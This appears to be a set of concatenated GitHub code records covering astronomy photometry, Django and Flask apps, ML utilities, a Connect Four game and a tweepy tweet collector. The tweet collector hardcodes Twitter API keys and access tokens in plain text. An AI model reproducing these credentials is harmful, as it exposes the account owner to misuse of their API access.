self.worker_seed = worker_seed\n self.deterministic = deterministic\n self.epoch = epoch\n\n def __iter__(self):\n \"\"\"Return an iterator over the shards.\"\"\"\n if isinstance(self.epoch, SharedEpoch):\n epoch = self.epoch.get_value()\n else:\n # NOTE: this is epoch tracking is problematic in a multiprocess (dataloader workers or train)\n # situation as different workers may wrap at different times (or not at all).\n self.epoch += 1\n epoch = self.epoch\n\n if self.deterministic:\n # reset seed w/ epoch if deterministic\n if self.worker_seed is None:\n # pytorch worker seed should be deterministic due to being init by arg.seed + rank + worker id\n seed = pytorch_worker_seed(epoch)\n else:\n seed = self.worker_seed() + epoch\n seed = seed + 
int(time.time())\n self.rng.seed(seed)\n # logging.info(f\"epoch: {epoch} seed: {seed}\")\n self.rng.shuffle(self.urls)\n # logging.info(f\"{len(self.urls)} | {self.urls[:2]}\")\n for url in self.urls:\n # logging.info(f\"{seed}: {url}\")\n yield dict(url=url)\n","repo_name":"UMass-Foundation-Model/CoVLM","sub_path":"open_flamingo/train/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"29620245055","text":"#Tools to help with extraction of photometry\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\nfrom photutils.centroids import centroid_com\nfrom photutils import aperture_photometry, SkyCircularAperture, SkyCircularAnnulus\nfrom photutils.utils import calc_total_error\nfrom astropy.table import Table\nfrom astropy.time import Time\n\ndef generate_regions(hdu, approx_location, centering_width = 80, ap_rad = 6.5, in_rad = 7.0, out_rad = 14.0):\n \"\"\"\n Generates source and background regions for aperture photometry. \n Given an image and the approximate RA/Dec of the source, finds the \n centroid within centering_width pixels and generates regions with \n the given parameters\n \n Parameters\n ----------\n hdu : `~astropy.io.fits.hdu.image.PrimaryHDU`\n HDU object containing the FITS image from which regions are generated.\n Should be just the primary hdu (e.g., hdu[0]).\n approx_location : `~astropy.coordinates.SkyCoord`\n `astropy.coordinates.SkyCoord` with the RA and Dec of the object you \n want to generate a region for.\n centering_width : int, optional\n Size of box around source region to find the centroid of in pixels.\n ap_rad : float, optional\n Radius of source region in arcseconds.\n in_rad : float, optional\n Inner radius of background annulus in arcseconds\n out_rad : float, optional\n Outer radius of background annulus in arcseconds\n \n \n Returns\n -------\n src : `~photutils.SkyCircularAperture`\n Aperture object for source\n bkg : `~photutils.SkyCircularAnnulus`\n Aperture object for background\n \n \"\"\"\n \n #Make data and wcs objects\n data = hdu.data\n wcs = WCS(hdu)\n \n #Make the right shape array of coordinates\n world_loc = np.array([[approx_location.ra.value,approx_location.dec.value]])\n \n #Convert to pixel coordinates from the FITS image, 0 indexed b.c. we're working with\n #a numpy array\n approx_pix = wcs.wcs_world2pix(world_loc,0)[0]\n \n #Convert to pixel locations of the window.\n min_x = int(approx_pix[0] - centering_width/2.0)\n min_y = int(approx_pix[1] - centering_width/2.0)\n max_x = int(approx_pix[0] + centering_width/2.0)\n max_y = int(approx_pix[1] + centering_width/2.0)\n \n #Make a little cutout around the object\n #Numpy arrays are weird, so x->y, y->x\n stamp = data[min_y:max_y,min_x:max_x]\n \n #Calculate the centroid of the stamp\n x_stamp_centroid, y_stamp_centroid = centroid_com(stamp)\n \n #Add back in the boundaries of the box to get centroid in data coords\n x_centroid = x_stamp_centroid + min_x\n y_centroid = y_stamp_centroid + min_y\n \n #Convert back to RA/Dec. 
Remember, these are 0-indexed pixels.\n centroid = wcs.wcs_pix2world(np.array([[x_centroid,y_centroid]]),0)\n \n #Convert centroid to SkyCoords object\n location = SkyCoord(ra = centroid[0,0] * u.degree, dec = centroid[0,1] * u.degree)\n \n #Generate regions based on coordinates and given radii.\n src = SkyCircularAperture(location, r=ap_rad * u.arcsecond)\n bkg = SkyCircularAnnulus(location, r_in=in_rad * u.arcsecond, r_out=out_rad * u.arcsecond)\n \n return src,bkg\n\ndef extract_photometry(filename, approx_location, centering_width = 80, ap_rad = 7.0, in_rad = 8.0, out_rad = 15.0):\n \"\"\"\n Does aperture photometry on the reduced image in filename, at the location \n specified by approx_location\n \n Parameters\n ----------\n filename : str\n Name of the reduced image.\n approx_location : `~astropy.coordinates.SkyCoord`\n `astropy.coordinates.SkyCoord` with the RA and Dec of the object you \n want to extract. Passed to generate_regions.\n centering_width : int, optional\n Size of box around source region to find the centroid of in pixels. \n Passed to generate_regions.\n ap_rad : float, optional\n Radius of source region in arcseconds. Passed to generate_regions.\n in_rad : float, optional\n Inner radius of background annulus in arcseconds. Passed to generate_regions.\n out_rad : float, optional\n Outer radius of background annulus in arcseconds. Passed to generate_regions.\n \n \n Returns\n -------\n phot_table : `~astropy.table.Table`\n A table containing the photometry information. This is the original filename, \n the time of the start of the observation, the exposure time, the time associated \n with the data point, the filter, the center of the extraction region, the radius \n of the source region, the area of the source region in pixels, the source counts, \n the source count error, the center of the background region, the inner radius of \n the background region, the outer radius of the background region, the area of the \n background region, the background counts, the background count error, then the net\n counts, net count error, and the instrumental magnitude and instrumental magnitude\n error.\n \n \"\"\"\n #Open up the file\n hdu = fits.open(filename)[0]\n \n #Let's do some bookkeeping\n #Get the TAI time from the header, convert to an astropy.time.Time object\n time_header = hdu.header['DATE-OBS']\n obs_time_obj = Time(time_header, scale = 'tai')\n #Get the actual value of the MJD out of the astropy object\n obs_time = obs_time_obj.mjd\n \n exp_time = hdu.header['EXPTIME'] * u.second\n time_obj = obs_time_obj + (exp_time/2.0)\n #Get the value of the MJD out of the astropy object again.\n time = time_obj.mjd\n \n #Get the name of the filter\n filt = hdu.header['FILTER']\n \n #Now for some actual photometry\n #Give me the data!\n data = hdu.data\n \n #Major source of error in the image assumed to be readout noise and photon shot noise.\n #The latter is handled by calc_total_error. 
The former is just an array the same size\n    #as the data, filled with the read out noise.\n    ron = hdu.header['GTRON11']\n    error_arr = np.full(data.shape,ron)\n    #Calculate the total error array from the data + gain (Poisson noise) and readout noise.\n    gain = hdu.header['GTGAIN11']\n    error = calc_total_error(data,error_arr,gain)\n    \n    #Generate source regions\n    src,bkg = generate_regions(hdu,approx_location, centering_width, \n                               ap_rad, in_rad, out_rad)\n    #Grab the centers of the source and background regions\n    src_center = (src.positions.ra.value,src.positions.dec.value)\n    bkg_center = (bkg.positions.ra.value,bkg.positions.dec.value)\n    \n    apers = [src,bkg]\n    \n    #Do some aperture photometry!\n    phot_table = aperture_photometry(hdu, apers, error=error)\n    \n    #Grab the counts\n    src_cts = phot_table['aperture_sum_0'].data[0]\n    src_cts_err = phot_table['aperture_sum_err_0'].data[0]\n    \n    bkg_cts = phot_table['aperture_sum_1'].data[0]\n    bkg_cts_err = phot_table['aperture_sum_err_1'].data[0]\n    \n    #We need source and background region areas, convert sky regions to pix regions\n    wcs = WCS(hdu)\n    src_pix = src.to_pixel(wcs)\n    bkg_pix = bkg.to_pixel(wcs)\n    \n    #Calculate region areas\n    src_area = src_pix.area()\n    bkg_area = bkg_pix.area()\n    \n    #Scale the background counts to the source region area\n    bkg_scaled = bkg_cts * (src_area / bkg_area)\n    bkg_scaled_err = bkg_cts_err * (src_area / bkg_area)\n    \n    #Net flux = Source - Bkg\n    net_cts = src_cts - bkg_scaled\n    net_cts_err = np.sqrt(src_cts_err**2.0 + bkg_scaled_err**2.0)\n    \n    inst_mag = -2.5*np.log10(net_cts/exp_time.value)\n    inst_mag_err = 2.5 * net_cts_err / (net_cts*np.log(10.0))\n    \n    out_table = Table([[filename],[obs_time],[exp_time.value],[time],[filt],[src_center],[ap_rad],\n                   [src_area],[src_cts],[src_cts_err],[bkg_center],[in_rad],[out_rad],\n                   [bkg_area],[bkg_cts],[bkg_cts_err],[net_cts],[net_cts_err],\n                   [inst_mag],[inst_mag_err]],\n                  names = ['Filename','Obs_start','Exptime','Time','Filter','Src_center',\n                           'Src_rad','Src_area','Src_cts','Src_cts_err','Bkg_center','Bkg_in_rad',\n                           'Bkg_out_rad','Bkg_area','Bkg_cts','Bkg_cts_err','Net_cts','Net_cts_err',\n                           'Inst_mag','Inst_mag_err'])\n    \n    return out_table\n","repo_name":"tzdwi/adapt","sub_path":"phot_tools.py","file_name":"phot_tools.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5653230066","text":"# import the modules\nfrom django.test import TestCase\nfrom .models import Message_wolof\n\n# Create the test cases\nclass Test_data(TestCase):\n    # A function for running tests on the models\n    def test_message_wolof(self):\n        messages = Message_wolof()\n        messages.message = \"On effectue les testes\"\n        messages.emotion = \"Positive\"\n\n        self.assertEqual(messages.message, \"On effectue les testes\")\n        self.assertEqual(messages.emotion, 
\"Positive\")","repo_name":"Dar-rius/Wolof_IA","sub_path":"message_wolof/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"fr","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"36899428034","text":"#!/usr/bin/env python3\n\ntables = {\n 'FILM_GENERAL': {\n 'id': 'FILM_ID',\n 'Description': 'FILM_DESC',\n 'Name': 'FILM_NAME'\n },\n 'FILM_CREW': {\n 'id': 'FILM_ID',\n 'Star': 'FILM_STAR',\n 'Rating': 'FILM_RATING',\n 'Director': 'FILM_DIRECTOR',\n 'Writer': 'FILM_WRITER'\n },\n 'FILM_ML': {\n 'id': 'FILM_ID',\n 'ml_tiny_int': 'FILM_TINY_INT',\n 'ml_int': 'FILM_INT',\n 'ml_array_int': 'FILM_ARRAY_INT',\n 'ml_array_double': 'FILM_ARRAY_DOUBLE',\n }\n}\n\ndatabase_scheme = {\n 'FILM_GENERAL': {\n 'FILM_ID': 'INTEGER',\n 'FILM_DESC': 'STRING',\n 'FILM_NAME': 'CHAR(255)'\n },\n 'FILM_CREW': {\n 'FILM_ID': 'INTEGER',\n 'FILM_STAR': 'ARRAY',\n 'FILM_RATING': 'DOUBLE',\n 'FILM_DIRECTOR': 'ARRAY',\n 'FILM_WRITER': 'ARRAY'\n },\n 'FILM_ML': {\n 'FILM_ID': 'INTEGER',\n 'FILM_TINY_INT': 'TINYINT',\n 'FILM_INT': 'INTEGER',\n 'FILM_ARRAY_INT': 'ARRAY',\n 'FILM_ARRAY_DOUBLE': 'ARRAY',\n }\n}\n","repo_name":"NobodyOne04/unix_lab","sub_path":"loaders/src/database_config.py","file_name":"database_config.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ur","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4692249082","text":"from rest_framework import serializers\nfrom rest_framework.utils.serializer_helpers import ReturnDict\nfrom api.models import Trail, TrailImage\n\n\nclass TrailListSerializer(serializers.ListSerializer):\n class Meta:\n model = Trail\n fields = ('id', 'name', 'latitude', 'longitude', 'length', 'difficulty', 'restroom',)\n\n @property\n def data(self):\n ret = super(serializers.ListSerializer, self).data\n ret = {'trails': ret}\n return ReturnDict(ret, serializer=self)\n\n\nclass TrailSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Trail\n fields = ('id', 'name', 'latitude', 'longitude', 'length', 'difficulty', 'restroom')\n list_serializer_class = TrailListSerializer\n\n\nclass TrailImageSerializer(serializers.ModelSerializer):\n trail = TrailSerializer()\n\n class Meta:\n model = TrailImage\n fields = ('image', 'timestamp', 'trail',)","repo_name":"HikeOregon/web-app","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28352655186","text":"import json\nfrom flask import Flask, redirect, escape, session, request\nfrom maat_webservice import Webservice\n\n\nclass TestWebservice(Webservice):\n \"\"\"Maât maat_webservice\"\"\"\n\n def __init__(self, *args, **kwargs):\n Webservice.__init__(self, *args, **kwargs)\n\n def additional_route(self):\n \"\"\"Additional route for test authentification\"\"\"\n\n @self.app.route('/info')\n def index():\n if 'username' in session:\n\n username_active = escape(session[\"username\"])\n ret = 'Active User: %s
                liste = json.loads(session['users'])\n                print(liste)\n                if liste is not None:\n                    for i in json.loads(session[\"users\"]):\n                        mi = escape(i)\n                        if mi == username_active:\n                            continue\n                        ret += 'Test: <a href=\"/test/%s\">%s</a><br/>' % (mi, mi)\n                ret += '<a href=\"/login\">Add a user</a><br/>'\n                ret += '<a href=\"/clean\">Clean session</a><br/>'\n                return ret\n            return 'No active session<br/><a href=\"/login\">Add a user</a>'\n\n        @self.app.route(\"/test/<username>\")\n        def test(username):\n            if 'username' in session:\n                liste = json.loads(session['users'])\n                print(liste)\n                if liste is not None and username in liste:\n                    session['username'] = escape(username)\n                    return redirect(\"/\")\n            return redirect(\"/info\")\n\n        @self.app.route('/login', methods=['GET', 'POST'])\n        def login():\n            if request.method == 'POST':\n                session['username'] = request.form['username']\n                if 'users' in session:\n                    a = json.loads(session['users'])\n                    if a is None:\n                        a = []\n                    a.append(request.form['username'])\n                    session['users'] = json.dumps(a)\n                else:\n                    session['users'] = json.dumps([request.form['username']])\n\n                return redirect(\"/info\")\n            return '''\n                <form method=\"post\">\n                    <p><input type=\"text\" name=\"username\"></p>\n                    <p><input type=\"submit\" value=\"Login\"></p>\n                </form>\n            '''\n\n        @self.app.route('/logout')\n        def logout():\n            session.pop('username', None)\n            session.pop('users', None)\n            return redirect(\"/info\")\n\n        @self.app.route('/clean')\n        def clean():\n            session.clear()\n            return redirect(\"/info\")\n\n    def login_required(self, func):\n        \"\"\"Check if the user is connected\"\"\"\n\n        def test(*args, **kwargs):\n            try:\n                if \"username\" not in session:\n                    return redirect(\"/login\")\n                return func(*args, **kwargs)\n            except Exception as e:\n                return str(e), 500\n\n        # Change the name of the function (for flask)\n        test.__name__ = func.__name__\n        return test\n\n    def username(self):\n        \"\"\"\n        Get the username of the client from the session.\n\n        This method is used by the session manager or backend to get the username of the current client by using the session\n        \"\"\"\n        if \"username\" in session:\n            return escape(session['username'])\n        return redirect(\"/info\")\n\n    # def route_add_session(self):\n    #     \"\"\"Will create a session\"\"\"\n    #     try:\n    #         backend = self.load_balancer.balance(self.username())\n    #         if self.__fake:\n    #             return redirect(backend.url(\"/add_sessions/%s\" % self.username()))\n    #         else:\n    #             return redirect(backend.url())\n    #     except Exception as e:\n    #         print(\"Error: %s\" % str(e))\n    #         return redirect(\"/\")\n\n","repo_name":"Valdimus/Maat","sub_path":"maat_webservice/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24654792774","text":"import tweepy\nimport csv\nimport pandas as pd\nfrom time import time\n\nprint(\"Started\")\n\n#API key:\nconsumer_key = 'AcgJgEnjNdEQIyCjXB14vG9n9'\n\n#API secret key:\nconsumer_secret = 'JiXHa1JQImgjJVECRjw9nTAmnUEQSaGJgRC84qfTbHGK7wa5Zd'\n\n#Access token:\naccess_token = '1694114796-Gs14uxJhaJYsu4pgkaCmCCP1mDMi6oe738vhazN'\n\n#Access token secret:\naccess_token_secret = 'H12jMiBb8JbsCG8nYqsCmiIDfOs2RiRXeQNycO0N1CUKr'\n\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth,wait_on_rate_limit=True)\n\n\ndatastorage = None\n\n\nsearch_words = \"#CoronaVirus\"\n\n# yyyy/mm/dd\ndate_since = \"2020-03-04\"\nprint(\"Date since:\", date_since)\n\nnew_search = search_words + \" -filter:retweets\"\n\n\nstart_time = time()\nprint(\"Collection started at:\", start_time)\n\ntweets = tweepy.Cursor(api.search, q=new_search,lang=\"en\", since=date_since).items(1000)\n\ndetails = [[tweet.id,tweet.user.screen_name,tweet.created_at,tweet.user.location,tweet.place.bounding_box.coordinates[0][0][0],tweet.place.bounding_box.coordinates[0][0][1],tweet.text] for tweet in tweets if tweet.place]\ntweet_data = pd.DataFrame(data=details, columns=['ID',\"Name\",\"Created_at\",\"Location\",\"Lat\",\"Long\",\"Text\"])\nif datastorage is None:\n    datastorage = tweet_data\nelse:\n    datastorage = datastorage.append(tweet_data)\nprint(len(datastorage), \"currently read tweets.\")\nif time() - start_time > 300:\n    start_time = time()\n    print(\"Collection started at:\", start_time)\n    print(\"***\", len(datastorage), \"SAVED TWEETS.\")\n    try:\n        dataset = pd.read_csv(r'./Dataset_Twitter.csv')\n        dataset = dataset.append(datastorage)\n        dataset.to_csv(r'./Dataset_Twitter.csv', index = False, header=True)\n    except IOError:\n        datastorage.to_csv(r'./Dataset_Twitter.csv', index=False, header=True)\n        datastorage = 
None\n","repo_name":"Yicheng-Lu/Social-Network-Data-Analysis","sub_path":"tweet_collector.py","file_name":"tweet_collector.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40319028621","text":"import yaml\nimport os\nfrom yaml.loader import FullLoader\nimport numpy as np\nimport pandas as pd\nimport json\nimport pickle\nfrom .libraries import *\nimport sys\nfrom Files.metrics import Metrics as met\nclass hyperparameter:\n    def optimize(model_str,modelname,userinputconfig,datapath,dataconfig,target_column,hyperparams,test_ratio):\n        \"\"\"\n        This function takes the string consisting of the name and the hyperparameters of the model and uses the eval function to create the model.\n        Keylist is the dictionary consisting of the information about the user input ('subject to further changes')\n        Name is the name of the model selected (subject to future changes)\n        \"\"\"\n\n        data=pd.read_csv(datapath)\n        ydata=data[target_column]\n        data.drop([target_column],inplace=True,axis=1)\n        xdata=data\n\n        with open(userinputconfig) as f:\n            userinputconfig= yaml.load(f,Loader=FullLoader)\n\n        with open(dataconfig) as c:\n            dataconfig=yaml.load(c,Loader=FullLoader)\n\n        params={}\n        for model in userinputconfig:\n            if model[\"name\"]==modelname:\n                \n                modelname=model[\"name\"]\n                print(modelname)\n                model_type=model[\"type\"]\n                for hyper in model[\"hyper\"]:\n                    if hyper[\"ischanged\"]==False:\n                        if hyper[\"vary\"]:\n                            if hyper[\"type\"]==\"options\":\n                                params[hyper[\"name\"]]=hyper[\"options\"]\n                            elif hyper[\"type\"]==\"bool\":\n                                params[hyper[\"name\"]]=[True,False]\n                            elif hyper[\"type\"]==\"float\" or hyper[\"type\"]==\"int\":\n                                if hyper[\"range\"][\"type\"]==\"linear\":\n                                    if hyper[\"type\"]==\"int\":\n                                        params[hyper[\"name\"]]=(np.linspace(hyper[\"range\"][\"min\"],hyper[\"range\"][\"max\"],hyper[\"range\"][\"num_samp\"])).astype(int)\n                                    else:\n                                        print(hyper)\n                                        params[hyper[\"name\"]]=np.linspace(hyper[\"range\"][\"min\"],hyper[\"range\"][\"max\"],hyper[\"range\"][\"num_samp\"])\n                                if hyper[\"range\"][\"type\"]==\"log\":\n                                    if hyper[\"type\"]==\"int\":\n                                        params[hyper[\"name\"]]=(np.logspace(np.log10(hyper[\"range\"][\"min\"]),np.log10(hyper[\"range\"][\"max\"]),hyper[\"range\"][\"num_samp\"])).astype(int)\n                                    else:\n                                        params[hyper[\"name\"]]=(np.logspace(np.log10(hyper[\"range\"][\"min\"]),np.log10(hyper[\"range\"][\"max\"]),hyper[\"range\"][\"num_samp\"]))\n                        else:\n                            if hyper[\"type\"]==\"option\":\n                                params[hyper[\"name\"]]=hyper[\"options\"]\n        model=eval(model_str)\n        sys.stdout=open(\"logs.log\",\"a+\")\n        with open(\"logs.log\",\"a+\") as f:\n            f.write(modelname)\n        \n        clf=RandomizedSearchCV(model, params,verbose=51,n_jobs=-1)\n        \n        x_train,x_test,y_train,y_test=train_test_split(xdata,ydata,test_size=test_ratio)\n        print(\"working on \"+ modelname)\n        clf.fit(x_train,y_train)\n        hyperparams[modelname]=clf.best_params_\n        \n        print(\"model completed for \" + modelname)\n        \n        location=os.path.join(dataconfig[\"location\"],str(dataconfig[\"id\"])+\"_model\")\n        picklepath=os.path.join(location,(str(modelname) +\".pkl\"))\n        with open(picklepath,\"wb\") as f:\n            pickle.dump(clf,f)\n        \n        prediction=clf.predict(x_test)\n        metricsrow=met.calculate_metrics(modelname,model_type,prediction,y_test)\n        print(\"hyper params are : \",hyperparams[modelname],\" for \",modelname)\n        return metricsrow, 
hyperparams","repo_name":"nikzagarwal/Project_21","sub_path":"Files/hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5752684679","text":"import seaborn as sn\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\n\ncats = [\"Apparel\",\"Automotive\",\"Beauty\",\"Beverage\",\"Business\",\"Construction\",\"Dining\",\"Education\",\"Financial\",\n \"Food\",\"Health and Medicine\",\"Household\",\"Shopping and Retail\",\"Toiletries\",\"Tourism and Travel\",\"Transport and Logistics\"]\n# rev_cats = cats[::-1]\n\ndef plotConfusionArray(array):\n df_cm = pd.DataFrame(array, index = [i for i in cats],\n columns = [i for i in cats])\n plt.figure(figsize = (16,7))\n sn.heatmap(df_cm, annot=True)\n\n plt.show()\n\ndef confusionArrayFromInOut(in_vals, out_vals):\n return np.array(tf.math.confusion_matrix(in_vals, out_vals, num_classes=len(cats)))\n\ndef AccuracyArrayFromInOut(in_vals, out_vals):\n numRight = dict()\n numTot = dict()\n accuracies = dict()\n for index, inp in enumerate(in_vals):\n if not inp in numTot:\n numTot[inp] = 0\n numRight[inp] = 0\n numTot[inp] += 1\n if out_vals[index] == inp:\n numRight[inp] += 1\n \n for cat in numTot.keys():\n accuracies[cat] = numRight[cat]/numTot[cat]\n \n return accuracies\n\ndef numOccurences(vals):\n numTot = dict()\n for val in vals:\n if not val in numTot:\n numTot[val] = 0\n numTot[val] += 1\n \n return numTot\n\n# plotConfusionArray(confusionArrayFromInOut([0,0,0,0,1,1,1,2,2,2,2,2,3,3,3,3,4,4,4,4,4,4,5,5,5,6,6,7,7,7,7,7,8,8,9,9,9,9,9], \n# [0,1,2,0,3,0,3,2,4,5,4,3,2,3,4,3,6,5,6,7,9,9,4,5,6,1,8,9,9,0,3,5,5,9,8,8,6,8,9]))\n\n# print(AccuracyArrayFromInOut([0,0,0,0,1,1,1,2,2,2,2,2,3,3,3,3,4,4,4,4,4,4,5,5,5,6,6,7,7,7,7,7,8,8,9,9,9,9,9], \n# [0,1,2,0,3,0,3,2,4,5,4,3,2,3,4,3,6,5,6,7,9,9,4,5,6,1,8,9,9,0,3,5,5,9,8,8,6,8,9]))\n\n# print(numOccurences([0,0,0,0,1,1,1,2,2,2,2,2,3,3,3,3,4,4,4,4,4,4,5,5,5,6,6,7,7,7,7,7,8,8,9,9,9,9,9]))","repo_name":"heckenna/SloganGenerationProject","sub_path":"testPlot.py","file_name":"testPlot.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34657014441","text":"import os\nimport random\nimport time\n\nfrom AI import AI\nfrom Game import Game, COLS, ROWS, PLAYER_1, PLAYER_2\n\ngame = Game()\n\n\ndef print_ending(game):\n if game.winner == 'Draw':\n print('\\nGame ended in draw!')\n else:\n print('\\n{} won the game!'.format(game.winner))\n\n\ndef print_game(game):\n os.system('clear')\n print(game)\n time.sleep(0.2)\n\n\ndef random_play():\n game.__init__()\n i = 0\n while not game.check_winner():\n i += 1\n\n player = PLAYER_1 if i % 2 else PLAYER_2\n\n # Make player move\n while not game.put_piece(random.randrange(0, COLS), player):\n pass\n\n print_game(game)\n\n print_ending(game)\n\n\ndef pvp():\n game.__init__()\n i = 0\n\n print(game)\n while not game.check_winner():\n i += 1\n\n player = PLAYER_1 if i % 2 else PLAYER_2\n\n # Make player move\n while True:\n try:\n move = int(input('\\n{} - Enter col:'.format(player))) - 1\n except ValueError:\n continue\n except EOFError:\n import sys; sys.exit()\n\n if game.put_piece(move, player):\n break\n\n print_game(game)\n\n print_ending(game)\n\n\ndef pve(turn=0):\n ai = AI(PLAYER_1, PLAYER_2)\n i = 0\n game.__init__()\n print_game(game)\n while not game.check_winner():\n i += 
1\n\n        if i % 2 == turn:\n            # TODO: Get AI turn\n            # player = PLAYER_1\n            # move =\n            move = ai.search(game)\n            game.put_piece(move, PLAYER_1)\n            print_game(game)\n            print('\\n',ai.pred)\n        else:\n            # Make player move\n            while True:\n                try:\n                    move = int(input('\\n{} - Enter col:'.format(PLAYER_2))) - 1\n                except ValueError:\n                    continue\n                except EOFError:\n                    import sys; sys.exit()\n\n                if game.put_piece(move, PLAYER_2):\n                    break\n            print_game(game)\n\n    print_ending(game)\n\n\ndef ave():\n    ai = AI(PLAYER_1, PLAYER_2)\n    i = 0\n    game.__init__()\n\n    while not game.check_winner():\n        i += 1\n\n        if i % 2 == 0:\n            # TODO: Get AI turn\n            # player = PLAYER_1\n            # move =\n            move = ai.search(game)\n            game.put_piece(move, PLAYER_1)\n\n        else:\n            while not game.put_piece(random.randrange(0, COLS), PLAYER_2):\n                pass\n\n        #print_game(game)\n        #print(ai.pred)\n\n    return game.winner\n    #print_ending(game)\n\n\ndef ava():\n    ai_1 = AI(PLAYER_1, PLAYER_2, max_depth=6)\n    ai_2 = AI(PLAYER_2, PLAYER_1, max_depth=4)\n    i = 0\n    game.__init__()\n\n    while not game.check_winner():\n        i += 1\n\n        if i % 2:\n            # TODO: Get AI turn\n            # player = PLAYER_1\n            # move =\n            move = ai_1.search(game)\n            game.put_piece(move, PLAYER_1)\n        else:\n            move = ai_2.search(game)\n            game.put_piece(move, PLAYER_2)\n\n        print_game(game)\n\n    print_ending(game)\n\n\nif __name__ == '__main__':\n#    pvp()\n#    pve()\n#    ava()\n    results = [0, 0, 0]\n    for i in range(1000):\n        if i % 10 == 0:\n            print(i)\n        winner = ave()\n        if winner == PLAYER_1:\n            results[0] += 1\n        elif winner == \"Draw\":\n            results[1] += 1\n        elif winner == PLAYER_2:\n            results[2] += 1\n\n\n","repo_name":"jtfidje/ikt623","sub_path":"connect_four/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42653168565","text":"import numpy as np\n\nfrom utils import onehot, decide, importance_sampling_ratio, mse\n\nclass MC_LEARNER():\n    def __init__(self, env):\n        self.observation_space, self.action_space = env.observation_space, env.action_space\n\n        self.return_counts = np.zeros(self.observation_space.n)\n        self.return_sums = np.zeros(self.observation_space.n)\n        self.return_square_sums = np.zeros(self.observation_space.n)\n\n        self.expected_return = np.zeros(self.observation_space.n)\n        self.variance_of_return = np.zeros(self.observation_space.n)\n\n    def backward_step(self, state, G):\n        self.return_sums[state] += G\n        self.return_counts[state] += 1\n\n        old_expectation = self.expected_return[state]\n        new_expectation = self.return_sums[state] / self.return_counts[state]\n        self.return_square_sums[state] += (G - old_expectation) * (G - new_expectation)\n\n        self.expected_return[state] = new_expectation\n        self.variance_of_return[state] = self.return_square_sums[state] / self.return_counts[state]\n\n\ndef MC(env, episodes, target, behavior, Lambda, gamma = lambda x: 0.95, alpha = 0.05, beta = 0.0001, diagnose = False):\n    \"\"\"\n    episodes: number of episodes\n    target: target policy matrix (|S|*|A|)\n    behavior: behavior policy matrix (|S|*|A|)\n    Lambda: LAMBDA object determining each lambda for each feature (or state or observation)\n    gamma: anonymous function determining the discount gamma for each feature (or state or observation)\n    alpha: learning rate for the weight vector of the values\n    beta: learning rate for the auxiliary vector for off-policy\n    \"\"\"\n    learner = MC_LEARNER(env)\n    expected_return_trace = []\n    variance_of_return_trace = []\n\n    for _ in range(episodes):\n        state, done = env.reset(), False\n\n        # Get the (s, 
a, r) pairs for an entire episode.\n episode = []\n done = False\n while not done:\n action = decide(state, behavior)\n next_state, reward, done, _ = env.step(action)\n if done:\n learner.return_counts[next_state] += 1\n episode.append((state, action, reward))\n state = next_state\n\n expected_return_trace.append(np.copy(learner.expected_return))\n variance_of_return_trace.append(np.copy(learner.variance_of_return))\n\n # Update expected G for every visit.\n G = 0.0\n for t in range(len(episode)-1, -1, -1):\n gamma_val = gamma(state)\n state, action, reward = episode[t]\n rho = importance_sampling_ratio(target, behavior, state, action)\n G = rho*(reward + gamma_val * G)\n\n learner.backward_step(state, G)\n\n return expected_return_trace, variance_of_return_trace, learner.return_counts","repo_name":"shubhampachori12110095/MTA","sub_path":"MC.py","file_name":"MC.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39200515962","text":"#!/usr/bin/env python\n\nimport Image, ImageDraw, ImageFont\n\nim = Image.open(\"image.jpg\")\nprint(im.format, im.size, im.mode)\n\nbox = (0, 0, 400, 400)\nregion = im.crop(box)\n# region.show()\n\ndraw = ImageDraw.Draw(im)\ndraw.line((0, 0, 200, 200), fill = 128)\ndraw.arc((0, 0, 200, 200), 0, 45, fill = (0, 255, 0))\ndraw.text((0, 0), \"Hello PIL\", fill=255)\n\nfont = ImageFont.truetype(\"arial.ttf\", 20)\ndraw.text((20, 20), \"Hello Boy!\", font=font, fill=(0, 255, 0))\n\ndel draw\n\nim.show()\n\n\n","repo_name":"yjwx0017/test","sub_path":"python-codes/testPIL.py","file_name":"testPIL.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1422823018","text":"from dash_extensions.enrich import DashProxy, html, dcc, ServersideOutputTransform\nimport dash_bootstrap_components as dbc\nfrom dash_app.callbacks import register_callbacks\nfrom dash_app.home import home_layout\nfrom dash_app.enrol import form_layout\nfrom dash_app.records import customer_records\nfrom 